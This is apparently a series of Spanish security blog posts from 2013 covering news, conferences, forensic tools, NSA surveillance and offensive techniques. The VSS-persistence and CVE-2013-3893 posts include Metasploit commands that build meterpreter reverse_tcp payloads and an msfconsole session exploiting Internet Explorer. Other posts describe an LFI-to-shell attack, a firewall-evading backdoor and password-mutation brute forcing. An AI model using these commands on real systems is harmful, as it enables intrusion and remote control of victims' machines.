Feliz Halloween con las más horripilantes amenazas informáticas

Hace unos días nos enviaron desde Trendmicro una infografía en la que se relaciona a los personajes tradicionalmente más terroríficos de Halloween con las amenazas de seguridad más alarmantes.

En esta ilustración los vampiros se comparan con los troyanos bancarios en la línea de que "chupan dinero de cuentas". Los zombies de las películas de Hollywood fueron los modelos que siguieron los hackers para crear sus propios zombies - "criaturas sin mente controladas por botmasters". Los fantasmas representan los ataques dirigidos que están diseñados para no ser vistos ni oidos. Los murciélagos son el creciente spyware en los teléfonos móviles que permiten a sus atacantes ver y escuchar lo que hay a su alrededor. Y las brujas son los programadores de malware pueden transformar su código casi por arte de magia.

¡Feliz Halloween!

Cómo usar Whatsapp desde tu PC con Pidgin y el plugin 'whatsapp-purple'

En esta entrada veremos cómo utilizar Whatsapp desde el ordenador mediante Pidgin, un cliente multiplataforma basado en GTK que permite el acceso simultáneo a varios chats.

En nuestro caso utilizaremos Pidgin bajo Windows 7 y lo primero que haremos será instalar el plugin 'whatsapp-purple' que implementa el protocolo de Whatsapp para libpurple, la librería de desarrollo de mensajería instantánea que utilizan varios clientes (incluido Pidgin). Para ello simplemente descargamos y copiamos la DLL (last-whatsapp.dll) en el directorio de plugins (C:\Program Files (x86)\Pidgin\plugins).

Veréis que una vez copiado el fichero al iniciar el cliente e intentar añadir una cuenta ya se puede seleccionar el protocolo Whatsapp:
Eso sí, para añadir una cuenta de Whatsapp en Pidgin necesitaremos primero conocer su contraseña correspondiente...

FIREBrick: un generador de imágenes y write blocker de código abierto

En los últimos años ha ido creciendo exponencialmente la necesidad de obtener y preservar evidencias digitales y lo que antes era tarea de especialistas ahora se ha convertido en rutina de muchos departamentos. Desgraciadamente la financiación muchas veces no acompaña a esta demanda.

FIREBrick es una alternativa de código abierto a los bloqueadores de escritura (write blockers) de hardware comerciales y generadores de imágenes de disco que se puede montar utilizando componentes con un valor que ronda tan sólo los 200€:

- Placa base ASRock E350M1
- 1Gb de memoria RAM DDR3 (1333 o 1066)
- Dynamode PCIX3FW 3-Port Firewire PCIe
- Una pantalla LCD2USB de 20×4
- Fuente 120W+ PSU
- Caja mini-ITX
- Discos SATA (si quieres almacenamiento interno)

Características:

- Imágenes de disco independientes, a velocidades de hasta 5 GB por minuto
- Imágenes hasheadas sobre la marcha con controles de verificación
- El disco de almacenamiento se puede cifrar (mediante LUKS)
- Funcionalidad bloqueador de escritura FireWire, la unidad de destino es visible como un disco duro FireWire
- Portátil: cabe en una pequeña caja HTPC (incluyendo pantalla)
- Libre, el firmware es de código abierto
- Puede ser totalmente personalizable según las necesidades específicas de los departamentos
- Se adhiere a los protocolos de pruebas con herramientas forenses de la NIST
- Almacenamiento interno configurado automáticamente (ninguno, solo disco o RAID)
- RAID mirroring y soporte striping
- Configuraciones ilimitadas - posibles ideas de desarrollo_ Android, Kindle, imágenes de USB, etc.


Código fuente, ROM e instrucciones:

https://github.com/leetobin/firebrickRemote

UPSTREAM, PRISM, SHELLTRUMPET y los mil programas de la NSA para controlar al mundo

Los medios arden con el escándalo del espionaje masivo de la NSA. Ahora algunos dirigentes europeos se escandalizan porque sus teléfonos han sido pinchados mientras que miles de ciudadanos llevan tiempo siendo sometidos a programas secretos de control y seguimiento. Metadatos de millones de llamadas son registradas y procesadas en tan sólo un mes por sus programas (61 millones sólo en España)... pero ¿cómo son capaces de hacerlo?

Durante años la NSA ha estado trabajando para que más de un tercio de las llamadas internacionales se enruten por un pocos switches o ‘chokepoints’ bajo su control. Además y según un informe de 2009 virtualmente la gran mayoría del tráfico de Internet atraviesa los EEUU y la NSA puede conseguir acceso directo a cables de fibra óptica que transfieren toda clase de comunicaciones. El nombre en clave para este programa de "escuchas de fibra" es UPSTREAM.
 

Por si fuera poco, todo lo que se "escapa" de UPSTREAM puede ser controlado mediante otro famoso programa que también desenmascaró Snowden: PRISM, nombre en clave de los acuerdos entre el gobierno de EE.UU. y más de un centenar de empresas de Internet privadas como Facebook, Dropbox, Yahoo o Gmail, y que dan a la NSA acceso a la información privada de sus usuarios.

Gracias por tanto a programas como UPSTREAM y PRISM se conforman los "tentáculos" de América que desde los atentados del 11 de septiembre se despliegan ilegalmente y sin órdenes judiciales mediante la FISA (Foreign Intelligence Surveillance Act o Ley de Vigilancia de la Inteligencia Extranjera). Pero, ¿se iba limitar EE.UU. a controlar la información sólo dentro de sus propios ciudadanos? Evidentemente no, puesto que quizás sus principales amenazas se encuentran fuera de sus fronteras.

Ejemplo práctico de cómo comprometer un sistema mediante una vulnerabilidad LFI (Local File Inclusion)

El siguiente vídeo muestra como explotar un vulnerabilidad LFI (Local File Inclusion) usando sólo curl y netcat. Después de instalar Tiny Core VM sobre Backtrack 5 R3 se levantan los servicios HTTP + SSH y se crea un fichero PHP vulnerable. Los permisos por defecto 644 de /var/log/auth.log en BT5 permiten una peligrosa inyección en log que se utiliza para obtener un shell contra el sistema. Muy instructivo:

Php.net marcado como sitio sospechoso por Google

Php.net es probablemente uno de los sitios más visitados por millones de desarrolladores de todo el mundo. Imaginar por un momento el impacto que tendría alojar en su web malware. Pues bien, menuda sorpresa nos hemos llevado hoy muchos al visitarlo:


Según un informe de Safe Browsing de Google, se ha encontrado contenido sospechoso en el sitio web el 23 de octubre:


Actualización: al parecer sí se encontró codigo Javascript malicioso posteado por un pequeño porcentaje de usuarios los días 22, 23 y 24 de octubre. Este código estaba destinado a la instalación del troyano "Tepfer" mediante un frame del exploit kit Magnitude. Los servidores comprometidos fueron dos y ya han sido cambiados por otros. Próximamente el certificado SSL será también sustituido y la contraseña de los usuarios reseteada.

Más información en:
http://php.net/archive/2013.php#id2013-10-24-2
http://arstechnica.com/security/2013/10/hackers-compromise-official-php-website-infect-visitors-with-malware/

Grabación por detección de movimiento mediante iSpy

Resulta que temporalmente tengo un sitio en la oficina un poquito más apartado y un auténtico imán para aquellos que desean hacer una llamada "digamos" más privada. Pues sí, a algún listo en mi ausencia le gusta sentarse en mi sitio y usar mi teléfono. Hasta ahí no hay problema, pero si al sujeto en particular le gusta además pegar mocos en pared y alrededores, entonces no hay barrera moral que me impida identificarlo, ¿verdad? ;)

Afortunadamente los portátiles de hoy en día vienen casi todos con una cámara integrada en la parte superior de la pantalla, de esas que hacen la delicia de aquellos malévolos hackers que troyanizan equipos para (entre otras cosas) satisfacer sus instintos de voayeur. La solución en bandeja: grabación por detección de movimiento.

Existen muchos programas para hacerlo aunque especialmente quería aprovechar para probar iSpy, una aplicación bastante completita, que permite plugins o gadgets y sobretodo es de código abierto.

Para lo básico en esta ocasión, que es pillar al orco que merodea por mi silla, la cosa es sencilla. Su instalación en Windows es "Siguiente, siquiente..." y para empezar añadiremos la cámara correspondiente (de momento no seré demasiado malo y no activaré el micrófono):



Mapa mundial de ataques digitales DDoS

Uno de los ataques más comunes contra un sitio web es un ataque distribuido de denegación de servicio (DDoS) en el cual una botnet con cientos e incluso miles de ordenadores bombardea un sitio web saturando su tráfico y haciéndolo temporal o permanentemente inservible.

Google (los equipos "Ideas" y "Big Picture") se ha asociado con Arbor Networks para ofrecer en un mapa digital que ofrece una visualización impresionante de los ataques de denegación de servicio en tiempo real en todo el mundo. No os lo perdáis:

http://www.digitalattackmap.com

TinySHell bajo SCTP: un backdoor de Unix un poquito más indetectable

Imagina una puerta trasera muy pequeñita abierta en servidor Unix que sin embargo te permite ejecutar comandos y subir o descargar ficheros sin que un firewall entre medias se "entere". Imagina Tiny SHell, el clásico backdoor de código abierto en Python de Christophe Devine, pero que en lugar de funcionar bajo TCP lo hace por SCTP (Stream Control Transmission Protocol).

¿Por qué? Pues porque SCTP es un protocolo diseñado en principio para transportar señalización telefónica SS7 sobre IP y sus paquetes no suelen ser analizados por muchos firewalls. El resultado: una alternativa a los "trillados" reverse shells bajo ICMP, TCP o UDP (túneles DNS incluidos) gracias a Darren “infodox” Martyn que ha portado tsh a este protocolo:


https://github.com/infodox/tsh-sctp


Crea tu propio CTF con Mellivora

¿Estás pensando en crear tus propios retos de hacking y preparar un CTF?. Mellivora es una herramienta que te ahorrará gran parte del trabajo con una base de datos básica y un motor escrito en PHP.
 
Requisitos:
 

LAMP: PHP 5.3+, MySQL 5.5+, Apache 2.2+. Aunque no se ha probado podría funcionar con otras configuraciones.

Instalación:


    - Descarga el software a un directorio de tu servidor: "/var/www/mellivora/".
    - Crea un Apache VHost y apunta DocumentRoot a "htdocs/". Hay un ejemplo de la config de Apache en el directorio "install/".
    - Crea una base de datos e importa la estructura desde "install/db.sql".
    - Edita "config.inc.php" y "db.inc.php" en "config/".
    - Da permisos de escritura aa Apache al directorio "writable/" y sus subdirectorios.

Web: https://github.com/Nakiami/mellivora


Ejemplo (Ruxcon): https://ctf.k17.org/scores

Recomendaciones: BackTrackAcademy

BackTrackAcademy o BTA es una comunidad sin fines de lucro en donde podrás crear, aportar y compartir todos los conocimientos relacionados con la seguridad informática disfrutando y realizando pruebas de penetración mediante la distribución de Linux Backtrack/Kali.

Actualmente dispone de miembros y colaboradores de varios países de LATAM que participan activamente publicando noticias y fantásticos manuales y tutoriales (no os perdáis por ejemplo el curso de Python) . Además están organizando hangout y retos de hacking gratuitos que os ofrecerán la posibilidad de aprender jugando. Así que no lo dudes y echa un vistazo a:

http://backtrackacademy.com/
http://twitter.com/BackTrackAcadem
https://www.facebook.com/BackTrackAcademy?fref=ts

Ocultar payloads persistentes en volúmenes 'shadow copy' de Windows

En Windows el servicio Volume Shadow Copy (VSS) crea copias de seguridad (snapshots) cada vez que hay un cambio en el sistema para poder tener disponible y actualizado un punto de restauración. Esta información de backup se almacena en volúmenes "ocultos" cuyas peculiaridades pueden ser aprovechadas con fines maliciosos, como por ejemplo ocultar artefactos de malware...

Recientemente se ha desarrollado un módulo de Metasploit para crear un payload persistente en un VSS en Windows 7. Se basa en el script VSSOwn de Tim Tomes y Mark Baggett y lo que hace es subir un ejecutable, crear un backup (VSS), borrarlo y ejecutar  \?\GLOBALROOT\/HarddiskVolumeShadowCopy\d{1,3}/%TEMP%\executable
La persistencia se consigue mediante una tarea programada (SCHTASK) o en una clave AUTORUN.

De momento para utilizarlo lo podemos descargar de Github:
root@kali:~# wget https://raw.github.com/MrXors/metasploit-framework/f345414832fe0895e6ed89e70eb57f72a103aeaf/modules/exploits/windows/local/vss_persistence.rb
root@kali:~# mv vss_persistence.rb /usr/share/metasploit-framework/modules/post/windows/manage/

Para probar generaremos un payload de prueba:
root@kali:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.177.128 LPORT=80 X > payload_prueba.exe

Descubierto un backdoor en los routers D-Link

Un investigador de seguridad  especializado en hardware y firmware ha encontrado una puerta trasera en los routers D-Link que permitiría evadir la autenticación y acceder al portal web de administración del dispositivo sin necesidad de conocer las credenciales de acceso.

Algo destacable es que se cree que este fallo habría sido descubierto hace  tres años y nadie informó al fabricante.

D-Link dice estar trabajando en la publicación de un firmware que solucione este problema y será publicado en breve en la página de soporte oficial.

Con el tipo de acceso que permite este fallo, un atacante podría controlar el tráfico de Internet de alguien a través de su propio servidor y leer su tráfico sin cifrar los datos.


Los routers afectados por este problema podrían ser los siguientes:

Whonix: otro sistema operativo para mantener el anonimato

Whonix es un sistema operativo centrado en el anonimato, la privacidad y la seguridad. Se basa en la red anónima Tor, Debian GNU/Linux y la seguridad mediante el aislamiento. La fuga de información mediante DNS es imposible, y ni siquiera el malware con privilegios de root podría encontrar la verdadera IP del usuario.

Whonix consta de dos partes: una aislada que ejecuta Tor y actúa como una puerta de enlace, llamada Whonix-Gateway. La otra Whonix-Workstation, está en una red completamente aislada. Sólo las conexiones a través de Tor son posibles.

 

Para obtener más información sobre la seguridad y el anonimato bajo Whonix, visita su web oficial: https://www.whonix.org.

Instalar Android en iPhone

Muchas de las personas que cuentan con iPhone también desean tener todos los beneficios que te dan los celulares con Android, que con su gran variedad de aplicaciones va ganando más usuarios en el mercado.

Pero gracias a los nuevos descubrimientos de los hackers y gente que se especializa en encontrar nuevas mejoras, se creó un nuevo sistema operativo de Android para iPhone llamado iDroid, para el cual solo basta aplicar 5 simples pasos y así poder contar con los dos sistemas operativos dentro del mismo dispositivo.


A continuación les presentaremos el procedimiento que se necesita para instalar iDroid en nuestro iPhone.


En primer lugar se tiene que tener en cuenta nuestro dispositivo, ya que este sistema operativo hasta el momento solo funciona en el iPhone 2G y 3G, este último es con el que se cuenta más apoyo y es en el que más se ha realizado este procedimiento. iDroid todavía es una versión de prueba, así que no esperen tener un sistema como el del Nexus 4 o Samsung Galaxy S4, aunque se espera que pronto se puedan disfrutar de todas sus características.


El primer paso de este procedimiento es hacer jailbreak en nuestro iPhone. Actualmente existen muchas maneras de realizar este paso, algunas de estas opciones son PwnageToll, Redsnow, Blackrain, etc,  tú decides cuál de todas utilizarás.

Project 2020: la serie de ficción que describe como evolucionará la ciberseguridad en la próxima década

Project 2020 es una serie web de ciencia ficción gratuita similar a las que se pueden ver en Netflix promovida por Trend Micro, la Europol y la ICSPA (Alianza Internacional para la Protección de la Ciberseguridad). Ofrece una visión de cómo evolucionará la ciberseguridad en la próxima década y tiene como objetivo anticipar el futuro de los delitos informáticos para ayudar a usuarios, empresas y gobiernos a estar más preparados y seguros.

La serie consta de nueve vídeos innovadores y educativos que tratan de reproducir las tres historias contadas en el Libro Blanco Project 2020, las cuales identifican una serie de posibles escenarios que describen la evolución de la delincuencia cibernética en el año 2020:

- En primer lugar, está la historia de Kinuko, una “nativa digital” de segunda generación cuya experiencia con el mundo está filtrada por el contenido virtual que llega a través de sus lentes de contacto, y que tiene tantas identidades en la red que ha externalizado la gestión de las mismas.

- Proyecto 2020 también describe a una Pyme del futuro, un fabricante de robots llamado Xinesys, que tiene que hacer frente a la cada vez mayor sofisticación de los activistas “anti-seguridad” que tratan de socavar su cadena de suministro, y Lakoocha, un proveedor de servicios de contenido que creciente riesgo de padecer ataques a infraestructuras críticas.

- Por último,  se describe el gobierno de "South Sylvania", una emergente nación que utiliza perfiles avanzados de comportamiento para ayudar a los agentes de inteligencia a identificar a los individuos en riesgo de involucrarse en actividades terroristas o criminales.     

¿Tiene buena pinta verdad? Visita http://2020.trendmicro.com para ver los vídeos de la serie web. Además, en la sección de Descargas, podrás también bajarte el libro blanco Project 2020.

Abierto el plazo de inscripción de la “No cON Name 2013”

Por cuarto año consecutivo, el CosmoCaixa Barcelona acogerá una nueva edición de uno de los congresos de referencia en el sur de Europa, la No cON Name. Esta asociación sin ánimo de lucro, fue fundada en Palma de Mallorca en el año 2002. Desde entonces, sus integrantes, profesionales con amplia experiencia en empresas, organizaciones e instituciones vinculadas a la seguridad de la información, han estado trabajando con una misión: la actualización y difusión del conocimiento en seguridad de la información a profesionales y ciudadanos.

Una de las principales metas del congreso es servir de nexo de unión entre técnicos e investigadores y miembros de ámbitos empresariales para crear sinergias. Entre ellos destacamos temas de interés nacional: manifestar la carencia de seguridad en los servicios que se prestan desde la nube (cloud computing), los riesgos asociados a las nuevas tendencias de pago con tarjetas (NFC), el robo de información privilegiada a empresas y ciudadanos los cuales ceden sus datos a veces sin conocimiento de su posterior tratamiento y cesión (las extendidas redes sociales), debido a la falta de seguridad en los programas desarrollados para dispositivos móviles, parte de la sociedad de hoy en día: teléfonos inteligentes que utilizan aplicaciones de mensajería instantánea como el conocido Whatsapp, tabletas que se utilizan en los entornos corporativos como herramienta profesional de acceso y gestión de datos confidenciales de la organización, etc. Sin embargo cabe destacar que como ya remarcábamos el año pasado, uno de los vectores de ataque más potentes, utilizados y sigilosos que se encuentran en Internet sigue siendo el código malicioso. Este se filtra, evadiendo la mayoría de las medidas de seguridad más comunes como antivirus y antispyware, en nuestros teléfonos móviles, equipos de sobremesa, portátiles, tabletas y sistemas de la información corporativos. El resultado es un elevado impacto económico y de pérdida de clientes en organizaciones, extorsiones a ciudadanos que han sido objeto de un ataque de robo de credenciales, información de carácter personal como fotografías, y un largo etc.

Mutator: un generador de listas de contraseñas mutadas

Frecuentemente muchas contraseñas de usuarios de empresa son nombres genéricos con cambios (sustituyendo las vocales por números) a las que se le añade un carácter y/o el año. Por ejemplo: corporation: C0rp0r4t10n_2012

Podéis imaginar que un ataque de fuerza bruta es muchísimo más efectivo si se eligen los nombres adecuados (nombres de compañía, departamentos, administradores de dominio, etc.) y se generan las mutaciones pertinentes.

Mutator de @AloneInTheShell es una herramienta escrita en C que nos ayudará a generar un diccionario acorde con mutaciones del tipo:

* Mutaciones de mayúsculas/minúsculas (toUpper, ToLower, FirstCharUpper, SwapCase)
* A mutación l33t
* Añadir carácter especial
* Anexar cadena de una lista predefinida
* Añadir fecha

Abiertas las inscripciones para *GSICKMINDS* (Mentes Enfermas)

Desde GSIC acaban de lanzar la inscripción para el evento de Seguridad-IT *GSICKMINDS* (Mentes Enfermas). Será en A Coruña, los próximos 24, 25 y 26 de octubre.

Con estas jornadas pretenden llegar a todo el mundo: no solo técnicos, si no también a empresarios y usuarios de a pie. La seguridad informática nos afecta a todos y ¡todo el mundo puede aprender algo! (¿alguien no lee la prensa? Los casos PRISM, NSA, Snowden, discos duros de Bárcenas, etc.)

Este año celebran su 5º aniversario y, con tal motivo, el cartel que traen es IMPRESIONANTE. Como cabecera: Juliano Rizzo y Ángel Prado, ponentes internacionales que este año han "roto" el SSL (sí, has leído bien: el protocolo con que -entre otros- se navega por las "Webs Seguras" en Internet... HTTPS para los que entiendan). Ambos se juntarán por primera vez y en primicia en GSICKMINDS... un acontecimiento histórico y ¡único!

Pero hay mucho más: recorridos por las partes oscuras y profundas de Internet, hacking completo del juego TriviaDos (¡¡6M de usuarios comprometidos!!), seguridad en tarjetas de crédito, criptografía, VozIP... vienen incluso los del Grupo de Delitos Telemáticos de la Guardia Civil, y también el archiconocido Chema Alonso (empezando a usar ya IPv6 para atacar nuestras comunicaciones...). Nadie se lo quiere perder, vamos
Y además ¡ES GRATIS!

Tenéis muchos más detalles en la Web:

PORTADA: http://gsickminds.net
PONENCIAS: http://gsickminds.net/ponencias.html
INSCRIPCION: http://gsickminds.net/inscripcion.php

¡Nos esperan!

Recopilación de herramientas para la extracción y el análisis de memoria en Linux

Como todos sabéis, en un análisis forense es tremendamente útil la obtención del volcado de memoria volátil y su posterior análisis, sobretodo porque muchos artefactos de malware usan funciones que no dejan datos en disco.

Quizás la mayoría de herramientas de adquisición y análisis de memoria estaban orientadas a sistemas en Windows porque durante años ha sido el gran objetivo de los "códigos maliciosos". No obstante con el gran auge de Android y otros sistemas Linux/Unix, esta tendencia está cambiando y se hace necesario saber utilizar y tener a mano algunas de las siguientes herramientas:

1. Volatility Framework: quizás una de las más famosas colecciones de herramientas para la extración y el análisis de la memoria volatil (RAM). Sin embargo el soporte para Linux es todavía experimental: ver la página LinuxMemoryForensics en el Volatility wiki. (Licencia GNU GPL)

2. Idetect (Linux): una vieja implementación para el análisis de la memoria en Linux.

3. LiME (Linux Memory Extractor): presentado en la ShmooCon 2012, es un módulo cargable para el kernel (LKM) y permite la adquisión de memoria incluso en Android.

4. Draugr: interesante herramienta que puede buscar símbolos del kernel (patrones en un fichero XML o con EXPORT_SYMBOL), procesos (información y secciones) (por la lista de enlaces del kernel o por fuerza bruta) y desensamblar/volcar la memoria.

5. Volatilitux: framework en Python equivalente a Volatility en Linux. Soporta arquitecturas ARM, x86 y x86 con PAE activado.

6. Memfetch: sencilla utilidad para volcar la memoria de procesos en ejecución o cuando se descubre una condición de fallo (SIGSEGV).

7. Crash de Red Hat: es una herramienta independiente para investigar tanto los sistemas en funcionamiento como los volcados de memoria del kernel hechos con lo paquetes de Red Hat netdump, diskdump o kdump. También se puede utilizar para el análisis forense de memoria.

8. Memgrep: sencilla utilidad para buscar/reemplazar/volcar memoria de procesos en ejecución y ficheros core.

9. Memdump: se puede utilizar para volcar la memoria del sistema al stream de salida, saltando los huecos de los mapas de la memoria. Por defecto vuelca el contenido de la memoria física (/dev/mem). Se distribuye bajo la Licencia Pública de IBM.

10. Foriana: esta herramienta es útil para la extracción de información de procesos y listas de módulos desde una imagen de la RAM con la ayuda de las relaciones lógicas entre las estructuras del sistema operativo.

11. Forensic Analysis Toolkit (FATKit): un nuevo framework multiplataforma y modular diseñado para facilitar la extracción, análisis, agregación y visualización de datos forenses en varios niveles de abstracción y complejidad de datos.

12. The Linux Memory Forensic Acquisition (Second Look): esta herramienta es una solución comercial con un driver de crashing modificado y scripts para volcado.

Fuentes:
Top 8 Tools To Search Memory Under Linux / Unix - Forensics Analysis
Linux Memory Analysis 

CVE-2013-3893 y un exploit para dominarlos a todos (los que usen Internet Explorer)

El 17 de septiembre de 2013 Microsoft publicó un aviso acerca de un nuevo 0-day en Internet Explorer que se estaba utilizando en varios ataques dirigidos. El pasado sábado FireEye confirmó que se estaba utilizando desde julio-agosto contra varias organizaciones de Japón dentro de lo que denominó operación "Deputy dog" debido a que dicha frase se encontraba entre el código del exploit.

La vulnerabilidad asociada al CVE-2013-3893 es de tipo use-after-free en memoria y permite la ejecución remota de código debido a una mala implementación de SetMouseCapture en mshtml.dll que afecta a todas las versiones de IE de la 6 a la 11. El exploit además utiliza una combinación de heap spraying y el módulo ‘mscorie.dll’ para evadir DEP y ASLR. 

Lo malo (o lo bueno) es que el lunes publicó un módulo en Metasploit para explotarlo y Microsoft de momento sólo ha publicado un Fix-it para solucionarlo. Es decir, al no incluir una actualización automática en Windows Update la única contramedida actual es la instalación manual del parche o la distribución del msi a través de SCCM/Altiris... y ya sabéis lo esto significa: ¡millones y millones de PCs en todo el mundo vulnerables!

Ante tal nicho de mercado sólo nos queda afilarnos los dientes y probarlo :P


root@kali:~/# wget http://www.exploit-db.com/download/28682
root@kali:~/# mv 28682 /usr/share/metasploit-framework/modules/exploits/windows/browser/ie_setmousecapture_uaf.rb
root@kali:~/# msfconsole
       =[ metasploit v4.7.0-2013092501 [core:4.7 api:1.0]
+ -- --=[ 1196 exploits - 726 auxiliary - 200 post
+ -- --=[ 312 payloads - 30 encoders - 8 nops

msf > use exploit/windows/browser/ie_setmousecapture_uaf

msf exploit(ie_setmousecapture_uaf) > set srvhost 192.168.177.128
srvhost => 192.168.177.128
msf exploit(ie_setmousecapture_uaf) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ie_setmousecapture_uaf) > set lhost 192.168.177.128
lhost => 192.168.177.128
msf exploit(ie_setmousecapture_uaf) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic
   1   IE 9 on Windows 7 SP1 with Microsoft Office 2007 or 2010

msf exploit(ie_setmousecapture_uaf) > set target 1
target => 1

msf exploit(ie_setmousecapture_uaf) > show options

Module options (exploit/windows/browser/ie_setmousecapture_uaf):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   SRVHOST     192.168.177.128  yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                      no        The URI to use for this exploit (default is random)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST     192.168.177.128  yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   IE 9 on Windows 7 SP1 with Microsoft Office 2007 or 2010

msf exploit(ie_setmousecapture_uaf) > [*] Using URL: http://192.168.177.128:8080/fyfa4sovCnSmvK7
[*] Server started.
[*] 192.168.177.1    ie_setmousecapture_uaf - Checking target requirements...
[*] 192.168.177.1    ie_setmousecapture_uaf - Using Office 2010 ROP chain

Abierto el proceso de solicitud de ponencias para la Rooted CON V

Comienza la internacionalización de la Rooted XD
Recientemente nuestro amigo Omar Benbouazza nos avisaba de que se acaba de abrir el proceso de solicitud de ponencias (Call For Papers) de la quinta edición de la Rooted CON, actualmente uno de los eventos de seguridad informática más importantes de España.

El congreso tendrá lugar los próximos 6,7 y 8 de Marzo de 2014 y esta nueva edición presenta como grandes novedades el traslado al Hotel Auditórium Madrid con mayor capacidad y la intención de traer ponentes internacionales que impartirán charlas con traducción simultánea.

Desde Hackplayers os animamos a la participación y a estar atentos a más sorpresas que seguramente se irán desvelando durante los próximos meses. Os dejamos con la nota de Organización Rooted CON:
 _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____
|_____|_____|_____|_____|_____|_____|_____|_____|_____|_____|_____|

Rooted CON 2014 - 'Call for Papers'

POR FAVOR, LEA ATENTAMENTE TODOS LOS DETALLES EN ESTE DOCUMENTO.

-=] Acerca de RootedCON

RootedCON 2014 es un Congreso de seguridad que se realizará en Madrid 
(España) desde el 6 al 8 de marzo de 2014.

Con un aforo estimado de casi 1000 personas, es uno de los congresos 
especializados más grandes que se realizan en el país y uno de los más 
grandes de Europa, con perfiles de asistentes que varían desde 
estudiantes, a fuerzas del estado, pasando por profesionales dentro 
del mercado de la Seguridad en TI o, simplemente, entusiastas de la 
tecnología.